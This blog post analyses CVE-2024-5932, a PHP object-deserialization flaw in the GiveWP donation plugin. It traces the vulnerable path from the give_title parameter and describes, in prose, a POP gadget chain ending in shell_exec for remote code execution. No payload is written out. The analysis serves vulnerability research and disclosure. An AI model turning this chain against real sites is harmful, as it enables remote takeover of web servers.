CVE-2024-5932
date
Aug 21, 2024
slug
PHP deserialization - POP chain
status
Published
tags
PHP
WebSec
summary
1 Day - Givewp
type
Post
PHP POP Chain for Remote Code Execution in GiveWP Plugin
Vulnerable Code Overview
- Donation Form Processing:
- The
give_process_donation_form()
function handles and processes donation form submissions. - Validation occurs through the
give_donation_form_validate_fields()
function. - Serialized fields are checked by
give_donation_form_has_serialized_fields()
.
- User Title Assignment:
- The
give_get_donation_form_user()
function assigns theuser_title
using thegive_title
POST parameter.
- Donation Data Preparation:
- The
give_process_donation_form()
function prepares$donation_data
and sends it to the payment gateway viagive_send_to_gateway()
.
- Donor Metadata Insertion:
- The
insert()
method in theDonorRepository
class inserts donor metadata, including the prefix which is derived from theuser_title
parameter.
- Unserialization and Vulnerability Triggering:
- The
_give_donor_title_prefix
meta is unserialized in thesetup_user_info()
function.
Exploitation Steps
- instance of : Stripe\StripeObject -> __toString (magic method) -> toArray ->$_values['foo'] instance of Give\PaymentsGateways\DataTransferObjects\GiveInsertPaymentData -> toarry -> getLegacyBillingAddress -> $userInfo['address'] intance of Give -> adress property -> __get magic -> $container instance of \Give\vendors\Faker\validGenerator -> get -> __call -> $validator property is 'shell_exec' string -> invoke function with call_user_function($this->validator, $res)
The
$userInfo['address']
in the GiveInsertPaymentData class instance can be set to an instance of the Give class. In the Give class, the $container property can be set, and when the __get()
magic method is called, for example when the address1 property is queried, it invokes the get() method of the container.Instance of Stripe\StripeObject:
The POP chain begins with an instance of the Stripe\StripeObject class. The
__toString
magic method is called, which invokes the toArray()
method. Instance of Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData:
The
toArray()
method processes the $_values['foo'],
which is an instance of GiveInsertPaymentData. This instance contains the method getLegacyBillingAddress. Instance of Give:The getLegacyBillingAddress method accesses
$userInfo['address'],
which is an instance of the Give class. When the address1 property is accessed, the __get
magic method of Give is invoked. Instance of Give\Vendors\Faker\ValidGenerator:
The __get method accesses the $container, which is an instance of ValidGenerator. When the get method is called on ValidGenerator, the __call magic method is invoked. Execution of shell_exec:
The $validator property of ValidGenerator is set to shell_exec. The __call method uses call_user_func($this->validator, $res), executing the shell_exec() function with the payload provided.